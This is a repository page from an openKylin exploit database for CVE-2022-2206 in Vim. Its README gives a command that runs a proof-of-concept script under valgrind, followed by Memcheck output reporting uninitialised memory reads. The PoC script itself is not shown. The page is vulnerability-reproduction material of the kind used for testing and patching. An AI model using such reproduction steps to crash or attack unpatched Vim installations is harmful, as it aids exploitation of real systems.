openkylin
/
openkylin-exploit-db
mirror of https://gitee.com/openkylin/openkylin-exploit-db.git
9
0
Fork 0
Code Issues Projects Releases Wiki Activity
openkylin-exploit-db/cve/vim/2022/CVE-2022-2206
History
LI, WENJIE 65c8e583ff add cve/vim/2022/CVE-2022-2206 2022-11-23 14:01:57 +08:00
..
README.md add cve/vim/2022/CVE-2022-2206 2022-11-23 14:01:57 +08:00
poc_vim01.txt add cve/vim/2022/CVE-2022-2206 2022-11-23 14:01:57 +08:00

README.md

漏洞复现

$ valgrind vim  -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_vim01.txt -c :qa!
==20351== Memcheck, a memory error detector
==20351== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==20351== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info
==20351== Command: vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_vim01.txt -c :qa!
==20351==
==20351== Conditional jump or move depends on uninitialised value(s)
==20351==    at 0x4842D78: strlen (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==20351==    by 0x207E42: ??? (in /usr/bin/vim.basic)
==20351==    by 0x18FC57: ??? (in /usr/bin/vim.basic)
==20351==    by 0x333989: ??? (in /usr/bin/vim.basic)
==20351==    by 0x333BCC: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1EBA65: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1EBFEC: ??? (in /usr/bin/vim.basic)
==20351==    by 0x176EED: ??? (in /usr/bin/vim.basic)
==20351==    by 0x218EB5: ??? (in /usr/bin/vim.basic)
==20351==    by 0x219F0F: ??? (in /usr/bin/vim.basic)
==20351==    by 0x220CE5: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1A9554: ??? (in /usr/bin/vim.basic)
==20351==
==20351== Conditional jump or move depends on uninitialised value(s)
==20351==    at 0x4842D78: strlen (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
==20351==    by 0x333545: ??? (in /usr/bin/vim.basic)
==20351==    by 0x333922: ??? (in /usr/bin/vim.basic)
==20351==    by 0x333BCC: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1EBA65: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1EBFEC: ??? (in /usr/bin/vim.basic)
==20351==    by 0x176EED: ??? (in /usr/bin/vim.basic)
==20351==    by 0x218EB5: ??? (in /usr/bin/vim.basic)
==20351==    by 0x219F0F: ??? (in /usr/bin/vim.basic)
==20351==    by 0x220CE5: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1A9554: ??? (in /usr/bin/vim.basic)
==20351==    by 0x1A9717: ??? (in /usr/bin/vim.basic)
==20351==
==20351==
==20351== HEAP SUMMARY:
==20351==     in use at exit: 100,874 bytes in 595 blocks
==20351==   total heap usage: 1,630 allocs, 1,035 frees, 500,373 bytes allocated
==20351==
==20351== LEAK SUMMARY:
==20351==    definitely lost: 0 bytes in 0 blocks
==20351==    indirectly lost: 0 bytes in 0 blocks
==20351==      possibly lost: 1,490 bytes in 25 blocks
==20351==    still reachable: 99,384 bytes in 570 blocks
==20351==                       of which reachable via heuristic:
==20351==                         newarray           : 1,536 bytes in 16 blocks
==20351==         suppressed: 0 bytes in 0 blocks
==20351== Rerun with --leak-check=full to see details of leaked memory
==20351==
==20351== Use --track-origins=yes to see where uninitialised values come from
==20351== For lists of detected and suppressed errors, rerun with: -s
==20351== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)